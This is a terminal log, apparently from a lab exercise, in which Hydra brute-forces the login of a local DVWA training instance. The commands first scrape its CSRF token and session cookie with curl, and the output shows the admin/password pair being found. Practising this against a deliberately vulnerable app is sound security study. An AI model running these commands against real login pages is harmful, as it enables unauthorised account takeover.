1

1. [root:~]# rm -f hydra.restore; export HYDRA_PROXY_HTTP=http://127.0.0.1:8080
2. [root:~]# CSRF=$(curl -s -c dvwa.cookie 192.168.1.33/DVWA/login.php | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
3. [root:~]# SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}')
4. [root:~]#
5. [root:~]# hydra -l admin -p password -e ns -u -F -t 1 -w 10 -W 1 -V 192.168.1.33 http-post-form "/DVWA/login.php:username=^USER^&password=^PASS^&user_token=${CSRF}&Login=Login:S=Location\: index.php:H=Cookie: security=impossible; PHPSESSID=${SESSIONID}"
6. Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
7.  
8. Hydra (http://www.thc.org/thc-hydra) starting at 2015-10-15 21:51:22
9. [INFO] Using HTTP Proxy: http://127.0.0.1:8080
10. [INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
11. [DATA] max 1 task per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
12. [DATA] attacking service http-post-form on port 80
13. [ATTEMPT] target 192.168.1.33 - login "admin" - pass "admin" - 1 of 3 [child 0]
14. [ATTEMPT] target 192.168.1.33 - login "admin" - pass "" - 2 of 3 [child 0]
15. [ATTEMPT] target 192.168.1.33 - login "admin" - pass "password" - 3 of 3 [child 0]
16. [80][http-post-form] host: 192.168.1.33 login: admin password: password
17. [STATUS] attack finished for 192.168.1.33 (valid pair found)
18. 1 of 1 target successfully completed, 1 valid password found
19. Hydra (http://www.thc.org/thc-hydra) finished at 2015-10-15 21:51:50
20. [root:~]#